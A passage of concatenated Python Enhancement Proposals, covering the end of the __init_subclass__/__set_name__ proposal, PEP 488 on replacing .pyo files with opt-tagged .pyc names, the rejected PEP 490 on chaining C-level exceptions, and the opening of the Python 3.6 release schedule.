into the class creation:
An __init_subclass__ hook that initializes
all subclasses of a given class.
Upon class creation, a __set_name__ hook is called on all the
attributes (descriptors) defined in the class.
The third category is the topic of another PEP, PEP 520.
As an example, the first use case looks as follows:
>>> class QuestBase:
...     # this is implicitly a @classmethod (see below for motivation)
...     def __init_subclass__(cls, swallow, **kwargs):
...         cls.swallow = swallow
...         super().__init_subclass__(**kwargs)
>>> class Quest(QuestBase, swallow="african"):
...     pass
>>> Quest.swallow
'african'
The base class object contains an empty __init_subclass__
method which serves as an endpoint for cooperative multiple inheritance.
Note that this method has no keyword arguments, meaning that all
methods which are more specialized have to process all keyword
arguments.
This general proposal is not a new idea (it was first suggested for
inclusion in the language definition more than 10 years ago, and a
similar mechanism has long been supported by Zope’s ExtensionClass),
but the situation has changed sufficiently in recent years that
the idea is worth reconsidering for inclusion.
The second part of the proposal adds an __set_name__
initializer for class attributes, especially if they are descriptors.
Descriptors are defined in the body of a
class, but they do not know anything about that class, they do not
even know the name they are accessed with. They do get to know their
owner once __get__ is called, but still they do not know their
name. This is unfortunate, for example they cannot put their
associated value into their object’s __dict__ under their name,
since they do not know that name. This problem has been solved many
times, and is one of the most important reasons to have a metaclass in
a library. While it would be easy to implement such a mechanism using
the first part of the proposal, it makes sense to have one solution
for this problem for everyone.
To give an example of its usage, imagine a descriptor representing weak
referenced values:
import weakref

class WeakAttribute:
    def __get__(self, instance, owner):
        return instance.__dict__[self.name]()

    def __set__(self, instance, value):
        instance.__dict__[self.name] = weakref.ref(value)

    # this is the new initializer:
    def __set_name__(self, owner, name):
        self.name = name
Such a WeakAttribute may, for example, be used in a tree structure
where one wants to avoid cyclic references via the parent:
class TreeNode:
    parent = WeakAttribute()

    def __init__(self, parent):
        self.parent = parent
Note that the parent attribute is used like a normal attribute,
yet the tree contains no cyclic references and can thus be easily
garbage collected when out of use. The parent attribute magically
becomes None once the parent ceases existing.
While this example looks very trivial, it should be noted that until
now such an attribute cannot be defined without the use of a metaclass.
And given that such a metaclass can make life very hard, this kind of
attribute does not exist yet.
Initializing descriptors could simply be done in the
__init_subclass__ hook. But this would mean that descriptors can
only be used in classes that have the proper hook, the generic version
like in the example would not work generally. One could also call
__set_name__ from within the base implementation of
object.__init_subclass__. But given that it is a common mistake
to forget to call super(), it would happen too often that suddenly
descriptors are not initialized.
Key Benefits
Easier inheritance of definition time behaviour
Understanding Python’s metaclasses requires a deep understanding of
the type system and the class construction process. This is legitimately
seen as challenging, due to the need to keep multiple moving parts (the code,
the metaclass hint, the actual metaclass, the class object, instances of the
class object) clearly distinct in your mind. Even when you know the rules,
it’s still easy to make a mistake if you’re not being extremely careful.
Understanding the proposed implicit class initialization hook only requires
ordinary method inheritance, which isn’t quite as daunting a task. The new
hook provides a more gradual path towards understanding all of the phases
involved in the class definition process.
Reduced chance of metaclass conflicts
One of the big issues that makes library authors reluctant to use metaclasses
(even when they would be appropriate) is the risk of metaclass conflicts.
These occur whenever two unrelated metaclasses are used by the desired
parents of a class definition. This risk also makes it very difficult to
add a metaclass to a class that has previously been published without one.
By contrast, adding an __init_subclass__ method to an existing type poses
a similar level of risk to adding an __init__ method: technically, there
is a risk of breaking poorly implemented subclasses, but when that occurs,
it is recognised as a bug in the subclass rather than the library author
breaching backwards compatibility guarantees.
New Ways of Using Classes
Subclass registration
Especially when writing a plugin system, one likes to register new
subclasses of a plugin baseclass. This can be done as follows:
class PluginBase:
    subclasses = []

    def __init_subclass__(cls, **kwargs):
        super().__init_subclass__(**kwargs)
        cls.subclasses.append(cls)
In this example, PluginBase.subclasses will contain a plain list of all
subclasses in the entire inheritance tree. One should note that this also
works nicely as a mixin class.
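A brief usage sketch (the plugin class names are illustrative):
class CSVPlugin(PluginBase):
    pass

class JSONPlugin(PluginBase):
    pass

PluginBase.subclasses   # [CSVPlugin, JSONPlugin], in definition order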
Trait descriptors
There are many designs of Python descriptors in the wild which, for
example, check boundaries of values. Often those “traits” need some support
of a metaclass to work. This is how this would look with this
PEP:
class Trait:
    def __init__(self, minimum, maximum):
        self.minimum = minimum
        self.maximum = maximum

    def __get__(self, instance, owner):
        return instance.__dict__[self.key]

    def __set__(self, instance, value):
        if self.minimum < value < self.maximum:
            instance.__dict__[self.key] = value
        else:
            raise ValueError("value not in range")

    def __set_name__(self, owner, name):
        self.key = name
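A short usage sketch (the class and the bounds are illustrative):
class Measurement:
    temperature = Trait(-273.15, 1000.0)

m = Measurement()
m.temperature = 20.0     # stored under the key set by __set_name__
m.temperature = 2000.0   # raises ValueError("value not in range")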
Implementation Details
The hooks are called in the following order: type.__new__ calls
the __set_name__ hooks on the descriptor after the new class has been
initialized. Then it calls __init_subclass__ on the base class, on
super(), to be precise. This means that subclass initializers already
see the fully initialized descriptors. This way, __init_subclass__ users
can fix all descriptors again if this is needed.
Another option would have been to call __set_name__ in the base
implementation of object.__init_subclass__. This way it would be possible
even to prevent __set_name__ from being called. Most of the times,
however, such a prevention would be accidental, as it often happens that a call
to super() is forgotten.
As a third option, all the work could have been done in type.__init__.
Most metaclasses do their work in __new__, as this is recommended by
the documentation. Many metaclasses modify their arguments before they
pass them over to super().__new__. For compatibility with those kind
of classes, the hooks should be called from __new__.
Another small change should be done: in the current implementation of
CPython, type.__init__ explicitly forbids the use of keyword arguments,
while type.__new__ allows for its attributes to be shipped as keyword
arguments. This is weirdly incoherent, and thus it should be forbidden.
While it would be possible to retain the current behavior, it would be better
if this was fixed, as it is probably not used at all: the only use case would
be that a metaclass calls its super().__new__ with name, bases and
dict (yes, dict, not namespace or ns as mostly used with modern
metaclasses) as keyword arguments. This should not be done. This little
change simplifies the implementation of this PEP significantly, while
improving the coherence of Python overall.
As a second change, the new type.__init__ just ignores keyword
arguments. Currently, it insists that no keyword arguments are given. This
leads to a (wanted) error if one gives keyword arguments to a class declaration
if the metaclass does not process them. Metaclass authors that do want to
accept keyword arguments must filter them out by overriding __init__.
In the new code, it is not __init__ that complains about keyword arguments,
but __init_subclass__, whose default implementation takes no arguments. In
a classical inheritance scheme using the method resolution order, each
__init_subclass__ may take out its keyword arguments until none are left,
which is checked by the default implementation of __init_subclass__.
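A hedged sketch of that cooperative scheme, in which each hook consumes its
own keyword and forwards the rest via super() (class names are illustrative):
class FormBase:
    def __init_subclass__(cls, form_name=None, **kwargs):
        super().__init_subclass__(**kwargs)   # pass remaining keywords up the MRO
        cls.form_name = form_name

class VersionedBase:
    def __init_subclass__(cls, version=None, **kwargs):
        super().__init_subclass__(**kwargs)
        cls.version = version

class LoginForm(FormBase, VersionedBase, form_name="login", version=2):
    pass
# Any keyword left over would reach the default __init_subclass__ and raise TypeError.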
For readers who prefer reading Python over English, this PEP proposes to
replace the current type and object with the following:
class NewType(type):
    def __new__(cls, *args, **kwargs):
        if len(args) != 3:
            return super().__new__(cls, *args)
        name, bases, ns = args
        init = ns.get('__init_subclass__')
        if isinstance(init, types.FunctionType):
            ns['__init_subclass__'] = classmethod(init)
        self = super().__new__(cls, name, bases, ns)
        for k, v in self.__dict__.items():
            func = getattr(v, '__set_name__', None)
            if func is not None:
                func(self, k)
        super(self, self).__init_subclass__(**kwargs)
        return self

    def __init__(self, name, bases, ns, **kwargs):
        super().__init__(name, bases, ns)

class NewObject(object):
    @classmethod
    def __init_subclass__(cls):
        pass
Reference Implementation
The reference implementation for this PEP is attached to
issue 27366.
Backward compatibility issues
The exact calling sequence in type.__new__ is slightly changed, raising
fears of backwards compatibility. It should be assured by tests that common use
cases behave as desired.
The following class definitions (except the one defining the metaclass)
continue to fail with a TypeError as superfluous class arguments are passed:
class MyMeta(type):
    pass

class MyClass(metaclass=MyMeta, otherarg=1):
    pass

MyMeta("MyClass", (), otherargs=1)

import types
types.new_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
types.prepare_class("MyClass", (), dict(metaclass=MyMeta, otherarg=1))
A metaclass defining only a __new__ method which is interested in keyword
arguments now does not need to define an __init__ method anymore, as the
default type.__init__ ignores keyword arguments. This is nicely in line
with the recommendation to override __new__ in metaclasses instead of
__init__. The following code does not fail anymore:
class MyMeta(type):
    def __new__(cls, name, bases, namespace, otherarg):
        return super().__new__(cls, name, bases, namespace)

class MyClass(metaclass=MyMeta, otherarg=1):
    pass
Only defining an __init__ method in a metaclass continues to fail with
TypeError if keyword arguments are given:
class MyMeta(type):
    def __init__(self, name, bases, namespace, otherarg):
        super().__init__(name, bases, namespace)

class MyClass(metaclass=MyMeta, otherarg=1):
    pass
Defining both __init__ and __new__ continues to work fine.
About the only thing that stops working is passing the arguments of
type.__new__ as keyword arguments:
class MyMeta(type):
    def __new__(cls, name, bases, namespace):
        return super().__new__(cls, name=name, bases=bases,
                               dict=namespace)

class MyClass(metaclass=MyMeta):
    pass
This will now raise TypeError, but this is weird code, and easy
to fix even if someone used this feature.
Rejected Design Options
Calling the hook on the class itself
Adding an __autodecorate__ hook that would be called on the class
itself was the proposed idea of PEP 422. Most examples work the same
way or even better if the hook is called only on strict subclasses. In general,
it is much easier to arrange to explicitly call the hook on the class in which it
is defined (to opt in to such a behavior) than to opt out (by remembering to check
for cls is __class__ in the hook body) when one does not want the hook to be
called on the class it is defined in.
This becomes most evident if the class in question is designed as a
mixin: it is very unlikely that the code of the mixin is to be
executed for the mixin class itself, as it is not supposed to be a
complete class on its own.
The original proposal also made major changes in the class
initialization process, rendering it impossible to back-port the
proposal to older Python versions.
When it’s desired to also call the hook on the base class, two mechanisms are available:
Introduce an additional mixin class just to hold the __init_subclass__
implementation. The original “base” class can then list the new mixin as its
first parent class.
Implement the desired behaviour as an independent class decorator, and apply that
decorator explicitly to the base class, and then implicitly to subclasses via
__init_subclass__.
Calling __init_subclass__ explicitly from a class decorator will generally be
undesirable, as this will also typically call __init_subclass__ a second time on
the parent class, which is unlikely to be desired behaviour.
Other variants of calling the hooks
Other names for the hook were presented, namely __decorate__ or
__autodecorate__. This proposal opts for __init_subclass__ as
it is very close to the __init__ method, just for the subclass,
while it is not very close to decorators, as it does not return the
class.
For the __set_name__ hook other names have been proposed as well,
__set_owner__, __set_ownership__ and __init_descriptor__.
Requiring an explicit decorator on __init_subclass__
One could require the explicit use of @classmethod on the
__init_subclass__ decorator. It was made implicit since there’s no
sensible interpretation for leaving it out, and that case would need
to be detected anyway in order to give a useful error message.
This decision was reinforced after noticing that the user experience of
defining __prepare__ and forgetting the @classmethod method
decorator is singularly incomprehensible (particularly since PEP 3115
documents it as an ordinary method, and the current documentation doesn’t
explicitly say anything one way or the other).
A more __new__-like hook
In PEP 422 the hook worked more like the __new__ method than the
__init__ method, meaning that it returned a class instead of
modifying one. This allows a bit more flexibility, but at the cost
of much harder implementation and undesired side effects.
Adding a class attribute with the attribute order
This got its own PEP 520.
History
This used to be a competing proposal to PEP 422 by Alyssa Coghlan and Daniel
Urban. PEP 422 intended to achieve the same goals as this PEP, but with a
different way of implementation. In the meantime, PEP 422 has been withdrawn
in favour of this approach.
Copyright
This document has been placed in the public domain.
PEP 488 – Elimination of PYO files
Author:
Brett Cannon <brett at python.org>
Status:
Final
Type:
Standards Track
Created:
20-Feb-2015
Python-Version:
3.5
Post-History:
06-Mar-2015,
13-Mar-2015,
20-Mar-2015
Table of Contents
Abstract
Rationale
Proposal
Implementation
importlib
Rest of the standard library
Compatibility Considerations
Rejected Ideas
Completely dropping optimization levels from CPython
Alternative formatting of the optimization level in the file name
Embedding the optimization level in the bytecode metadata
References
Copyright
Abstract
This PEP proposes eliminating the concept of PYO files from Python.
To continue the support of the separation of bytecode files based on
their optimization level, this PEP proposes extending the PYC file
name to include the optimization level in the bytecode repository
directory when there are optimizations applied.
Rationale
As of today, bytecode files come in two flavours: PYC and PYO. A PYC
file is the bytecode file generated and read from when no
optimization level is specified at interpreter startup (i.e., -O
is not specified). A PYO file represents the bytecode file that is
read/written when any optimization level is specified (i.e., when
-O or -OO is specified). This means that while PYC
files clearly delineate the optimization level used when they were
generated – namely no optimizations beyond the peepholer – the same
is not true for PYO files. To put this in terms of optimization
levels and the file extension:
0: .pyc
1 (-O): .pyo
2 (-OO): .pyo
The reuse of the .pyo file extension for both level 1 and 2
optimizations means that there is no clear way to tell what
optimization level was used to generate the bytecode file. In terms
of reading PYO files, this can lead to an interpreter using a mixture
of optimization levels with its code if the user was not careful to
make sure all PYO files were generated using the same optimization
level (typically done by blindly deleting all PYO files and then
using the compileall module to compile all-new PYO files [1]).
This issue is only compounded when people optimize Python code beyond
what the interpreter natively supports, e.g., using the astoptimizer
project [2].
In terms of writing PYO files, the need to delete all PYO files
every time one either changes the optimization level they want to use
or are unsure of what optimization was used the last time PYO files
were generated leads to unnecessary file churn. The change proposed
by this PEP also allows for all optimization levels to be
pre-compiled for bytecode files ahead of time, something that is
currently impossible thanks to the reuse of the .pyo file
extension for multiple optimization levels.
As for distributing bytecode-only modules, having to distribute both
.pyc and .pyo files is unnecessary for the common use-case
of code obfuscation and smaller file deployments. This means that
bytecode-only modules will only load from their non-optimized
.pyc file name.
Proposal
To eliminate the ambiguity that PYO files present, this PEP proposes
eliminating the concept of PYO files and their accompanying .pyo
file extension. To allow for the optimization level to be unambiguous
as well as to avoid having to regenerate optimized bytecode files
needlessly in the __pycache__ directory, the optimization level
used to generate the bytecode file will be incorporated into the
bytecode file name. When no optimization level is specified, the
pre-PEP .pyc file name will be used (i.e., no optimization level
will be specified in the file name). For example, a source file named
foo.py in CPython 3.5 could have the following bytecode files
based on the interpreter’s optimization level (none, -O, and
-OO):
0: foo.cpython-35.pyc (i.e., no change)
1: foo.cpython-35.opt-1.pyc
2: foo.cpython-35.opt-2.pyc
Currently bytecode file names are created by
importlib.util.cache_from_source(), approximately using the
following expression defined by PEP 3147 [3], [4]:
'{name}.{cache_tag}.pyc'.format(name=module_name,
                                cache_tag=sys.implementation.cache_tag)
This PEP proposes to change the expression when an optimization
level is specified to:
'{name}.{cache_tag}.opt-{optimization}.pyc'.format(
    name=module_name,
    cache_tag=sys.implementation.cache_tag,
    optimization=str(sys.flags.optimize))
The “opt-” prefix was chosen so as to provide a visual separator
from the cache tag. The placement of the optimization level after
the cache tag was chosen to preserve lexicographic sort order of
bytecode file names based on module name and cache tag which will
not vary for a single interpreter. The “opt-” prefix was chosen over
“o” so as to be somewhat self-documenting. The “opt-” prefix was
chosen over “O” so as to not have any confusion in case “0” was the
leading prefix of the optimization level.
A period was chosen over a hyphen as a separator so as to distinguish
clearly that the optimization level is not part of the interpreter
version as specified by the cache tag. It also lends to the use of
the period in the file name to delineate semantically different
concepts.
For example, if -OO had been passed to the interpreter then
instead of importlib.cpython-35.pyo the file name would be
importlib.cpython-35.opt-2.pyc.
Leaving out the new opt- tag when no optimization level is
applied should increase backwards-compatibility. This is also more
accommodating of Python implementations which have no use for
optimization levels (e.g., PyPy [10]).
It should be noted that this change in no way affects the performance
of import. Since the import system looks for a single bytecode file
based on the optimization level of the interpreter already and
generates a new bytecode file if it doesn’t exist, the introduction
of potentially more bytecode files in the __pycache__ directory
has no effect in terms of stat calls. The interpreter will continue
to look for only a single bytecode file based on the optimization
level and thus no increase in stat calls will occur.
The only potentially negative result of this PEP is the probable
increase in the number of .pyc files and thus increase in storage
use. But for platforms where this is an issue,
sys.dont_write_bytecode exists to turn off bytecode generation so
that it can be controlled offline.
Implementation
An implementation of this PEP is available [11].
importlib
As importlib.util.cache_from_source() is the API that exposes
bytecode file paths as well as being directly used by importlib, it
requires the most critical change. As of Python 3.4, the function’s
signature is:
importlib.util.cache_from_source(path, debug_override=None)
This PEP proposes changing the signature in Python 3.5 to:
importlib.util.cache_from_source(path, debug_override=None, *, optimization=None)
The introduced optimization keyword-only parameter will control
what optimization level is specified in the file name. If the
argument is None then the current optimization level of the
interpreter will be assumed (including no optimization). Any argument
given for optimization will be passed to str() and must have
str.isalnum() be true, else ValueError will be raised (this
prevents invalid characters being used in the file name). If the
empty string is passed in for optimization then the addition of
the optimization will be suppressed, reverting to the file name
format which predates this PEP.
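For example (hedged; the exact cache tag depends on the interpreter, and
"cpython-35" is assumed here):
import importlib.util

importlib.util.cache_from_source('foo.py', optimization='')
# e.g. '__pycache__/foo.cpython-35.pyc'
importlib.util.cache_from_source('foo.py', optimization=2)
# e.g. '__pycache__/foo.cpython-35.opt-2.pyc'
importlib.util.cache_from_source('foo.py')
# the optimization level of the running interpreter is used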
It is expected that beyond Python’s own two optimization levels,
third-party code will use a hash of optimization names to specify the
optimization level, e.g.
hashlib.sha256(','.join(['no dead code', 'const folding'])).hexdigest().
While this might lead to long file names, it is assumed that most
users never look at the contents of the __pycache__ directory and so
this won’t be an issue.
The debug_override parameter will be deprecated. A False
value will be equivalent to optimization=1 while a True
value will represent optimization='' (a None argument will
continue to mean the same as for optimization). A
deprecation warning will be raised when debug_override is given a
value other than None, but there are no plans for the complete
removal of the parameter at this time (but removal will be no later
than Python 4).
The various module attributes for importlib.machinery which relate to
bytecode file suffixes will be updated [7]. The
DEBUG_BYTECODE_SUFFIXES and OPTIMIZED_BYTECODE_SUFFIXES will
both be documented as deprecated and set to the same value as
BYTECODE_SUFFIXES (removal of DEBUG_BYTECODE_SUFFIXES and
OPTIMIZED_BYTECODE_SUFFIXES is not currently planned, but will be
not later than Python 4).
All various finders and loaders will also be updated as necessary,
but updating the previous mentioned parts of importlib should be all
that is required.
Rest of the standard library
The various functions exposed by the py_compile and
compileall modules will be updated as necessary to make sure
they follow the new bytecode file name semantics [6], [1]. The CLI
for the compileall module will not be directly affected (the
-b flag will be implicit as it will no longer generate .pyo
files when -O is specified).
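As a hedged sketch, pre-compiling every optimization level ahead of time
becomes practical because the resulting file names no longer collide (the
'pkg' directory is illustrative):
import compileall

# Each level writes a distinct file in __pycache__, e.g.
# foo.cpython-35.pyc, foo.cpython-35.opt-1.pyc, foo.cpython-35.opt-2.pyc
for level in (0, 1, 2):
    compileall.compile_dir('pkg', optimize=level, quiet=True)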
Compatibility Considerations
Any code directly manipulating bytecode files from Python 3.2 on
will need to consider the impact of this change on their code (prior
to Python 3.2 – including all of Python 2 – there was no
__pycache__ which already necessitates bifurcating bytecode file
handling support). If code was setting the debug_override
argument to importlib.util.cache_from_source() then care will be
needed if they want the path to a bytecode file with an optimization
level of 2. Otherwise only code not using
importlib.util.cache_from_source() will need updating.
As for people who distribute bytecode-only modules (i.e., use a
bytecode file instead of a source file), they will have to choose
which optimization level they want their bytecode files to be since
distributing a .pyo file with a .pyc file will no longer be
of any use. Since people typically only distribute bytecode files for
code obfuscation purposes or smaller distribution size then only
having to distribute a single .pyc should actually be beneficial
to these use-cases. And since the magic number for bytecode files
changed in Python 3.5 to support PEP 465 there is no need to support
pre-existing .pyo files [8].
Rejected Ideas
Completely dropping optimization levels from CPython
Some have suggested that instead of accommodating the various
optimization levels in CPython, we should instead drop them
entirely. The argument is that significant performance gains would
occur from runtime optimizations through something like a JIT and not
through pre-execution bytecode optimizations.
This idea is rejected for this PEP as that ignores the fact that
there are people who do find the pre-existing optimization levels for
CPython useful. It also assumes that no other Python interpreter
would find what this PEP proposes useful.
Alternative formatting of the optimization level in the file name
Using the “opt-” prefix and placing the optimization level between
the cache tag and file extension is not critical. All options which
have been considered are:
importlib.cpython-35.opt-1.pyc
importlib.cpython-35.opt1.pyc
importlib.cpython-35.o1.pyc
importlib.cpython-35.O1.pyc
importlib.cpython-35.1.pyc
importlib.cpython-35-O1.pyc
importlib.O1.cpython-35.pyc
importlib.o1.cpython-35.pyc
importlib.1.cpython-35.pyc
These were initially rejected either because they would change the
sort order of bytecode files, possible ambiguity with the cache tag,
or were not self-documenting enough. An informal poll was taken and
people clearly preferred the formatting proposed by the PEP [9].
Since this topic is non-technical and of personal choice, the issue
is considered solved.
Embedding the optimization level in the bytecode metadata
Some have suggested that rather than embedding the optimization level
of bytecode in the file name that it be included in the file’s
metadata instead. This would mean every interpreter had a single copy
of bytecode at any time. Changing the optimization level would thus
require rewriting the bytecode, but there would also only be a single
file to care about.
This has been rejected due to the fact that Python is often installed
as a root-level application and thus modifying the bytecode files for
modules in the standard library is not always possible. In this
situation integrators would need to guess at what a reasonable
optimization level was for users for any/all situations. By
allowing multiple optimization levels to co-exist simultaneously it
frees integrators from having to guess what users want and allows
users to utilize the optimization level they want.
References
[1] (1, 2)
The compileall module
(https://docs.python.org/3.5/library/compileall.html)
[2]
The astoptimizer project
(https://web.archive.org/web/20150909225454/https://pypi.python.org/pypi/astoptimizer)
[3]
importlib.util.cache_from_source()
(https://docs.python.org/3.5/library/importlib.html#importlib.util.cache_from_source)
[4]
Implementation of importlib.util.cache_from_source() from CPython 3.4.3rc1
(https://github.com/python/cpython/blob/e55181f517bbfc875065ce86ed3e05cf0e0246fa/Lib/importlib/_bootstrap.py#L437)
[6]
The py_compile module
(https://docs.python.org/3.5/library/compileall.html)
[7]
The importlib.machinery module
(https://docs.python.org/3.5/library/importlib.html#module-importlib.machinery)
[8]
importlib.util.MAGIC_NUMBER
(https://docs.python.org/3.5/library/importlib.html#importlib.util.MAGIC_NUMBER)
[9]
Informal poll of file name format options on Google+
(https://web.archive.org/web/20160925163500/https://plus.google.com/+BrettCannon/posts/fZynLNwHWGm)
[10]
The PyPy Project
(https://www.pypy.org/)
[11]
Implementation of PEP 488
(https://github.com/python/cpython/issues/67919)
Copyright
This document has been placed in the public domain.
PEP 490 – Chain exceptions at C level
Author:
Victor Stinner <vstinner at python.org>
Status:
Rejected
Type:
Standards Track
Created:
25-Mar-2015
Python-Version:
3.6
Table of Contents
Abstract
Rationale
Proposal
Modify PyErr_*() functions to chain exceptions
Modify functions to not chain exceptions
Modify functions to chain exceptions
Backward compatibility
Alternatives
No change
New helpers to chain exceptions
Appendix
PEPs
Python C API
Python Issues
Rejection
Copyright
Abstract
Chain exceptions at C level, as already done at Python level.
Rationale
Python 3 introduced a new killer feature: exceptions are chained by
default, PEP 3134.
Example:
try:
    raise TypeError("err1")
except TypeError:
    raise ValueError("err2")
Output:
Traceback (most recent call last):
  File "test.py", line 2, in <module>
    raise TypeError("err1")
TypeError: err1

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "test.py", line 4, in <module>
    raise ValueError("err2")
ValueError: err2
Exceptions are chained by default in Python code, but not in
extensions written in C.
A new private _PyErr_ChainExceptions() function was introduced in
Python 3.4.3 and 3.5 to chain exceptions. Currently, it must be called
explicitly to chain exceptions and its usage is not trivial.
Example of _PyErr_ChainExceptions() usage from the zipimport
module to chain the previous OSError to a new ZipImportError
exception:
PyObject *exc, *val, *tb;
PyErr_Fetch(&exc, &val, &tb);
PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
_PyErr_ChainExceptions(exc, val, tb);
This PEP proposes to also chain exceptions automatically at C level to
stay consistent and give more information on failures to help
debugging. The previous example becomes simply:
PyErr_Format(ZipImportError, "can't open Zip file: %R", archive);
Proposal
Modify PyErr_*() functions to chain exceptions
Modify C functions raising exceptions of the Python C API to
automatically chain exceptions: modify PyErr_SetString(),
PyErr_Format(), PyErr_SetNone(), etc.
Modify functions to not chain exceptions
Keeping the previous exception is not always useful when the new
exception already contains the information of the previous exception, or
even more information, especially when the two exceptions have the same type.
Example of a useless exception chain with int(str):
TypeError: a bytes-like object is required, not 'type'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: int() argument must be a string, a bytes-like object or a number, not 'type'
The new TypeError exception contains more information than the
previous exception. The previous exception should be hidden.
The PyErr_Clear() function can be called to clear the current
exception before raising a new exception, to not chain the current
exception with a new exception.
Modify functions to chain exceptions
Some functions save and then restore the current exception. If a new
exception is raised, it is currently either displayed on sys.stderr
or ignored, depending on the function. Some of these
functions should be modified to chain exceptions instead.
Examples of functions ignoring the new exception(s):
ptrace_enter_call(): ignore exception
subprocess_fork_exec(): ignore exception raised by enable_gc()
t_bootstrap() of the _thread module: ignore exception raised
by trying to display the bootstrap function to sys.stderr
PyDict_GetItem(), _PyDict_GetItem_KnownHash(): ignore
exception raised by looking for a key in the dictionary
_PyErr_TrySetFromCause(): ignore exception
PyFrame_LocalsToFast(): ignore exception raised by
dict_to_map()
_PyObject_Dump(): ignore exception. _PyObject_Dump() is used
to debug, to inspect a running process, it should not modify the
Python state.
Py_ReprLeave(): ignore exception “because there is no way to
report them”
type_dealloc(): ignore exception raised by
remove_all_subclasses()
PyObject_ClearWeakRefs(): ignore exception?
call_exc_trace(), call_trace_protected(): ignore exception
remove_importlib_frames(): ignore exception
do_mktuple(), helper used by Py_BuildValue() for example:
ignore exception?
flush_io(): ignore exception
sys_write(), sys_format(): ignore exception
_PyTraceback_Add(): ignore exception
PyTraceBack_Print(): ignore exception
Examples of functions displaying the new exception to sys.stderr:
atexit_callfuncs(): display exceptions with
PyErr_Display() and return the latest exception; the function
calls multiple callbacks and only returns the latest exception
sock_dealloc(): log the ResourceWarning exception with
PyErr_WriteUnraisable()
slot_tp_del(): display exception with
PyErr_WriteUnraisable()
_PyGen_Finalize(): display gen_close() exception with
PyErr_WriteUnraisable()
slot_tp_finalize(): display exception raised by the
__del__() method with PyErr_WriteUnraisable()
PyErr_GivenExceptionMatches(): display exception raised by
PyType_IsSubtype() with PyErr_WriteUnraisable()
Backward compatibility
A side effect of chaining exceptions is that exceptions store
traceback objects which store frame objects which store local
variables. Local variables are kept alive by exceptions. A common
issue is a reference cycle between local variables and exceptions: an
exception is stored in a local variable while the frame is indirectly
stored in the exception. The cycle only impacts applications that store
exceptions.
The reference cycle can now be fixed with the new
traceback.TracebackException object introduced in Python 3.5. It
stores information required to format a full textual traceback without
storing local variables.
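For illustration, the following sketch (not part of the PEP) shows how an
application can keep a formatted traceback without keeping the exception,
and therefore its frames, alive:
import traceback
def capture(exc):
    # Store only the information needed to format the traceback later,
    # not the exception object and its frames.
    return traceback.TracebackException.from_exception(exc)
try:
    1 / 0
except ZeroDivisionError as exc:
    stored = capture(exc)
print(''.join(stored.format()))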
The asyncio module is impacted by the reference cycle issue. This module
is also maintained outside the Python standard library to release a
version for Python 3.3. traceback.TracebackException may be
backported into a private asyncio module to fix reference cycle
issues.
Alternatives
No change
The new private _PyErr_ChainExceptions() function is enough to chain
exceptions manually.
Exceptions will only be chained explicitly where it makes sense.
New helpers to chain exceptions
Functions like PyErr_SetString() don’t chain exceptions
automatically. To make the usage of _PyErr_ChainExceptions() easier,
new private functions are added:
_PyErr_SetStringChain(exc_type, message)
_PyErr_FormatChain(exc_type, format, ...)
_PyErr_SetNoneChain(exc_type)
_PyErr_SetObjectChain(exc_type, exc_value)
Helper functions to raise specific exceptions like
_PyErr_SetKeyError(key) or PyErr_SetImportError(message, name,
path) don’t chain exceptions. The generic
_PyErr_ChainExceptions(exc_type, exc_value, exc_tb) should be used
to chain exceptions with these helper functions.
Appendix
PEPs
PEP 3134 – Exception Chaining and Embedded Tracebacks
(Python 3.0):
new __context__ and __cause__ attributes for exceptions
PEP 415 – Implement context suppression with exception attributes
(Python 3.3):
raise exc from None
PEP 409 – Suppressing exception context
(superseded by the PEP 415)
Python C API
The header file Include/pyerrors.h declares functions related to
exceptions.
Functions raising exceptions:
PyErr_SetNone(exc_type)
PyErr_SetObject(exc_type, exc_value)
PyErr_SetString(exc_type, message)
PyErr_Format(exc, format, ...)
Helpers to raise specific exceptions:
PyErr_BadArgument()
PyErr_BadInternalCall()
PyErr_NoMemory()
PyErr_SetFromErrno(exc)
PyErr_SetFromWindowsErr(err)
PyErr_SetImportError(message, name, path)
_PyErr_SetKeyError(key)
_PyErr_TrySetFromCause(prefix_format, ...)
Manage the current exception:
PyErr_Clear(): clear the current exception,
like except: pass
PyErr_Fetch(exc_type, exc_value, exc_tb)
PyErr_Restore(exc_type, exc_value, exc_tb)
PyErr_GetExcInfo(exc_type, exc_value, exc_tb)
PyErr_SetExcInfo(exc_type, exc_value, exc_tb)
Other functions to handle exceptions:
PyErr_ExceptionMatches(exc): check to implement
except exc: ...
PyErr_GivenExceptionMatches(exc1, exc2)
PyErr_NormalizeException(exc_type, exc_value, exc_tb)
_PyErr_ChainExceptions(exc_type, exc_value, exc_tb)
Python Issues
Chain exceptions:
Issue #23763: Chain exceptions in C
Issue #23696: zipimport: chain ImportError to OSError
Issue #21715: Chaining exceptions at C level: added
_PyErr_ChainExceptions()
Issue #18488: sqlite: finalize() method of user function may be
called with an exception set if a call to step() method failed
Issue #23781: Add private _PyErr_ReplaceException() in 2.7
Issue #23782: Leak in _PyTraceback_Add
Changes preventing exceptions from being lost:
Issue #23571: Raise SystemError if a function returns a result with an
exception set
Issue #18408: Fixes crashes found by pyfailmalloc
Rejection
The PEP was rejected on 2017-09-12 by Victor Stinner. It was decided in
the python-dev discussion to not chain C exceptions by default, but
instead chain them explicitly only where it makes sense.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 490 – Chain exceptions at C level | Standards Track | Chain exceptions at C level, as already done at Python level. |
PEP 494 – Python 3.6 Release Schedule
Author:
Ned Deily <nad at python.org>
Status:
Final
Type:
Informational
Topic:
Release
Created:
30-May-2015
Python-Version:
3.6
Table of Contents
Abstract
Release Manager and Crew
3.6 Lifespan
Release Schedule
3.6.0 schedule
3.6.1 schedule (first bugfix release)
3.6.2 schedule
3.6.3 schedule
3.6.4 schedule
3.6.5 schedule
3.6.6 schedule
3.6.7 schedule
3.6.8 schedule (last bugfix release)
3.6.9 schedule (first security-only release)
3.6.10 schedule
3.6.11 schedule
3.6.12 schedule
3.6.13 schedule
3.6.14 schedule
3.6.15 schedule (last security-only release)
Features for 3.6
Copyright
Abstract
This document describes the development and release schedule for
Python 3.6. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.6 Release Manager: Ned Deily
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard, Georg Brandl
3.6 Lifespan
3.6 will receive bugfix updates
approximately every 3 months for about 24 months. Sometime after the release of
